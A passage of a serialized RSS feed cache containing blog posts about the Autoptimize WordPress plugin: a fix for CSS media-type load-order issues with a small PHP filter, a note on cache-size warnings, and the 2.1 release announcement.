http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1-624x529.png 624w, http://static-blog.futtta.be/wp-content/uploads/2016/10/ao_200k-1.png 772w" sizes="(max-width: 300px) 100vw, 300px" /></a></p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/09/16/100k-active-autoptimize-installs-thanks/" rel="bookmark" title="100k active Autoptimize installs. Thanks!">100k active Autoptimize installs. Thanks! </a></li>\n<li><a href="http://blog.futtta.be/2013/12/09/blank-yoast-seo-sitemaps-no-more/" rel="bookmark" title="Blank Yoast SEO sitemaps no more!">Blank Yoast SEO sitemaps no more! </a></li>\n<li><a href="http://blog.futtta.be/2014/09/10/wp-seo-vs-autoptimize-who-broke-your-wordpress/" rel="bookmark" title="WP SEO vs Autoptimize; who broke your WordPress?">WP SEO vs Autoptimize; who broke your WordPress? </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/zirvZBKqhD4" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"5";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:73:"http://blog.futtta.be/2016/10/14/over-200000-active-autoptimize-installs/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:63:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:59:"How to fix CSS media-types impacting Autoptimized CSS order";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/In1_tZ-xwCE/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:102:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 04 Oct 2016 13:05:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:8:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:14:"css load order";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:13:"css mediatype";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:4:"okab";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:9:"pixeldima";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10394";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:318:"Adel of Pixeldima contacted me to look into a problem with some of the styles not being applied after autoptimization on the forum-page in his beautiful OKAB-theme. I had seen similar problems before, but decided to dig in this time to understand the root cause. That root cause turned out to be 2 CSS-files, one [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:5512:"<p><a href="https://themeforest.net/item/okab-responsive-multipurpose-wordpress-theme/16958600"><img class="alignright size-medium wp-image-10405" src="http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot-300x179.png" alt="pixeldima-forum-screenshot" width="300" height="179" srcset="http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot-300x179.png 300w, http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot-1024x612.png 1024w, http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot-624x373.png 624w, http://static-blog.futtta.be/wp-content/uploads/2016/10/pixeldima-forum-screenshot.png 1221w" sizes="(max-width: 300px) 100vw, 300px" /></a>Adel of <a href="http://pixeldima.com/">Pixeldima</a> contacted me to look into a problem with <strong>some of the styles not being applied after autoptimization</strong> on <a href="http://pixeldima.com/forums/">the forum-page</a> in his beautiful <a href="https://themeforest.net/item/okab-responsive-multipurpose-wordpress-theme/16958600">OKAB-theme</a>. I had seen similar problems before, but decided to dig in this time to understand the root cause. That root cause turned out to be <strong>2 CSS-files</strong>, one overriding the style of the other, having a different <strong>media-type</strong>, which <strong>messed up the load order</strong> once autoptimized. This <strong>can</strong> either <strong>be fixed</strong> at the theme-level, at AO configuration level or with a couple of lines of code hooking into AO&#8217;s API.</p>\n<h1>The problem</h1>\n<p>Without Autoptimize (which one can trigger by simply adding <em>?ao_noptimize=1</em> to the URL), these 2 relevant files were loaded (among many others obviously):</p>\n<ul>\n<li>bbpress.css (the default bbpress css-file) was loaded first with media=&#8221;screen&#8221;</li>\n<li>okab/bbpress-styles.css (part of the theme) is loaded second with media=&#8221;all&#8221;, overriding some of the CSS in bbpress.css</li>\n</ul>\n<p>Autoptimize honors the media-types, resulting in 2 Autoptimized CSS-files;</p>\n<ul>\n<li>autoptimize_1a002577cefe349767025a16201f37a9.css with <strong>media=&#8221;all&#8221;</strong> is loaded first (because the very first CSS-file encountered in the HTML had media=&#8221;all&#8221;) which contains okab/bbpress-styles.css</li>\n<li>autoptimize_8e3c7dac90177214b6583286ddaa141f.css is loaded second with <strong>media=&#8221;screen&#8221;</strong>, containing bbpress.css</li>\n</ul>\n<p>So due to the mediatype the code in bbpress-styles.css was loaded before the CSS in bbpress.css when Autoptimized, resulting in styles being overwritten the wrong way (bbpress-styles.css is overwritten by bbpress.css instead of the other way around).</p>\n<h1>The solution(s)</h1>\n<p>As Adel was the theme developer, he could immediately <strong>attack the root issue by enqueuing bbpress-styles.css with media=&#8221;screen&#8221;</strong>. This way both files share the same media-type and go in the same autoptimized CSS-file, resulting in the CSS of bbpress.css getting properly overwritten by the CSS of okab/bbpress-styles.css.</p>\n<p>If you&#8217;re not the theme developer you&#8217;ll probably not want to change the theme&#8217;s code (although you could dequeue and re-enqueue in a child-theme&#8217;s functions.php), in which case you have two workarounds at your disposal: the <strong>easiest workaround</strong> being simply <strong>excluding the CSS-file that gets overwritten from CSS optimization </strong>(i.e. in this case simply adding okab/bbpress-style.css to the list of CSS optimization exclusions). Easy indeed, but on the downside you&#8217;ll have one non-optimized CSS-file. That&#8217;s why it&#8217;s a good thing we have <strong>our precious little API</strong>, allowing us <strong>to override the media-type of the offending file</strong> with just a couple of lines of code, like this;</p>\n<pre class="brush: php; title: ; notranslate">add_filter(\'autoptimize_filter_css_tagmedia\',\'check_mediatype\',10,2);\nfunction check_mediatype($media,$tag) {\n  if ( strpos($tag,&quot;okab/bbpress-styles.css&quot;) !== false ) {\n	$media=array(&quot;screen&quot;);\n  }\n  return $media;\n}</pre>\n<h1>Conclusion</h1>\n<p>As <strong>Autoptimize honors the original CSS&#8217;s media-types</strong>, 2 <strong>CSS-files</strong> that ought to be loaded in a specific order <strong>might end up being loaded in the wrong order if their media-type is different</strong>. This <strong>can be fixed</strong> in the theme or worked around by excluding a specific CSS-file or using AO&#8217;s API to override the media-type for the offending CSS-file.</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2014/12/24/autoptimize-minor-update/" rel="bookmark" title="Autoptimize minor update and beyond">Autoptimize minor update and beyond </a></li>\n<li><a href="http://blog.futtta.be/2015/07/21/want-to-beta-test-autoptimize-power-ups/" rel="bookmark" title="Want to beta-test Autoptimize power-ups?">Want to beta-test Autoptimize power-ups? </a></li>\n<li><a href="http://blog.futtta.be/2015/08/07/why-autoptimize-doesnt-touch-non-local-cssjs/" rel="bookmark" title="Why Autoptimize doesn&#8217;t touch non-local CSS/JS">Why Autoptimize doesn&#8217;t touch non-local CSS/JS </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/In1_tZ-xwCE" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:98:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:93:"http://blog.futtta.be/2016/10/04/how-to-fix-css-media-types-impacting-autoptimized-css-order/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:5;a:6:{s:4:"data";s:69:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:51:"Autoptimize cache size: the canary in the coal mine";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/NcmcF0UfG5s/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:93:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Thu, 15 Sep 2016 16:11:59 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:10:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:13:"rants & raves";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:5:"alert";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:10:"auto-purge";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:5:"cache";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:7;a:5:{s:4:"data";s:10:"cache size";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:8;a:5:{s:4:"data";s:4:"cron";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:9;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10386";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:360:"Copy/ pasted straight from a support question on wordpress.org; Auto-deleting the cache would only solve one problem you&#8217;re having (disk space), but there are 2 other problems -which I consider more important- that auto-cleaning can never solve: 1. you will be generating new autoptimized JS very regularly, which slows your site down for users who [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2436:"<p><a href="http://static-blog.futtta.be/wp-content/uploads/2016/09/another-canary-in-a-coal-mine.jpg"><img class="alignright size-medium wp-image-10390" src="http://static-blog.futtta.be/wp-content/uploads/2016/09/another-canary-in-a-coal-mine-300x224.jpg" alt="another-canary-in-a-coal-mine" width="300" height="224" srcset="http://static-blog.futtta.be/wp-content/uploads/2016/09/another-canary-in-a-coal-mine-300x224.jpg 300w, http://static-blog.futtta.be/wp-content/uploads/2016/09/another-canary-in-a-coal-mine.jpg 450w" sizes="(max-width: 300px) 100vw, 300px" /></a>Copy/ pasted straight from <a href="https://wordpress.org/support/topic/auto-delete-cache/">a support question on wordpress.org</a>;</p>\n<blockquote><p>Auto-deleting the cache would only solve one problem you&#8217;re having (disk space), but there are 2 other problems -which I consider more important- that auto-cleaning can never solve:<br />\n1. you will be generating new autoptimized JS very regularly, which slows your site down for users who happen to be the unlucky ones requesting that page<br />\n2. a visitor going from page X to page Y will very likely have to request a different autoptimized JS file for page Y instead of using the one from page X from cache, again slowing your site down</p>\n<p>So I actually consider the cache-size warning like a <a href="https://en.wiktionary.org/wiki/canary_in_a_coal_mine">canary in the coal mines</a>; if the canary dies, you know there&#8217;s a bigger problem.</p>\n<p>You don&#8217;t (or shouldn&#8217;t) really want me to take away the canary! :)</p></blockquote>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2015/08/19/it-feels-great-to-see-ones-children-going-places/" rel="bookmark" title="It feels great to see ones children going places!">It feels great to see ones children going places! </a></li>\n<li><a href="http://blog.futtta.be/2016/03/15/why-would-you-still-be-on-php-5-2/" rel="bookmark" title="Why would you still be on PHP 5.2?">Why would you still be on PHP 5.2? </a></li>\n<li><a href="http://blog.futtta.be/2012/11/06/dipping-below-the-magical-1-second-page-load-time/" rel="bookmark" title="Dipping below the magical 1 second page load time">Dipping below the magical 1 second page load time </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/NcmcF0UfG5s" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:89:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"10";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:84:"http://blog.futtta.be/2016/09/15/autoptimize-cache-size-the-canary-in-the-coal-mine/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:6;a:6:{s:4:"data";s:60:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:43:"Autoptimize 2.1 and first Power-Up released";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/tUrnEBFcTw4/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:86:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sun, 04 Sep 2016 06:10:42 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:7:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:18:"optimizing matters";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:15:"active installs";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:24:"autoptimize critical css";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:8:"power-up";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:7:"release";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10382";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:364:"Yesterday evening I released Autoptimize 2.1 and the first Power-Up to manage critical CSS has been made available as a optional service over at criticalcss.com. This short video explains some of the logic behind the Autoptimize Critical CSS Power-Up: But let&#8217;s not forget about Autoptimize 2.1! The new features include: Autoptimize now appears in the [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2884:"<p>Yesterday evening I released <strong>Autoptimize 2.1</strong> and the first Power-Up to manage critical CSS has been made available as a optional service over at <a href="http://misc.optimizingmatters.com/partners/?from=blogpost&amp;partner=critcss">criticalcss.com</a>. This short video explains some of the logic behind the <strong>Autoptimize Critical CSS Power-Up</strong>:</p>\n<p><a href="http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/"><img src="https://i.ytimg.com/vi/S5sjZRWsgrM/hqdefault.jpg" alt="YouTube Video"></a><br />Watch this video <a href="http://youtu.be/S5sjZRWsgrM">on YouTube</a>.</p>\n<p>But let&#8217;s not forget about Autoptimize 2.1! The new features include:</p>\n<ul>\n<li>Autoptimize now appears in the admin-toolbar with an easy view on cache size and the possibility to purge the cache (thanks to <a href="https://github.com/pablocusto" rel="nofollow">Pablo Custo</a>)</li>\n<li>A &#8220;More Optimization&#8221;-tab is shown with info about optimization tools- and services.</li>\n<li>settings-screen now accepts protocol-relative URL for CDN base URL</li>\n<li>admin GUI updated and responsiveness added</li>\n<li>If cache size becomes too big, a mail will be sent to the site admin</li>\n<li>power-users can enable Autoptimize to pre-gzip the autoptimized files with a filter</li>\n<li>new (smarter) defaults for JS and CSS optimization</li>\n</ul>\n<p>Although excluding jQuery from autoptimization by default might seem counter-intuitive, the &#8220;smarter&#8221; defaults should allow <strong>more Autoptimize installs to work out-of-the-box</strong> (including on sites run by people who might not be inclined to troubleshoot/ reconfigure Autoptimize in the first place).</p>\n<p>And thanks to the release I now have a better idea of the <strong>number of active installs</strong> (which wordpress.org lists as +100000); 2.1 was downloaded 3239 times yesterday evening and it is listed as running on 1.8% sites. Simple math learns that Autoptimize is currently active on approx. <strong>180000</strong> WordPress websites. Let&#8217;s aim for 200K by the end of 2016! :-)</p>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2016/09/02/almost-time-to-announce/" rel="bookmark" title="Almost time to announce">Almost time to announce </a></li>\n<li><a href="http://blog.futtta.be/2016/02/03/autoptimize-powerup-sneak-peak-noptimize/" rel="bookmark" title="Autoptimize Power-Up sneak peek; Noptimize">Autoptimize Power-Up sneak peek; Noptimize </a></li>\n<li><a href="http://blog.futtta.be/2016/02/29/heads-up-autoptimize-minor-release/" rel="bookmark" title="Heads up: Autoptimize minor release">Heads up: Autoptimize minor release </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_wordpress/~4/tUrnEBFcTw4" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:82:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:2:"10";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:77:"http://blog.futtta.be/2016/09/04/autoptimize-2-1-and-first-power-up-released/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:7;a:6:{s:4:"data";s:69:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:23:"Almost time to announce";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:63:"http://feedproxy.google.com/~r/futtta_wordpress/~3/e9COTtG7a6o/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:65:"http://blog.futtta.be/2016/09/02/almost-time-to-announce/#respond";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 02 Sep 2016 05:12:22 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:10:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:18:"optimizing matters";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:11:"performance";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:24:"autoptimize critical css";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:20:"autoptimize 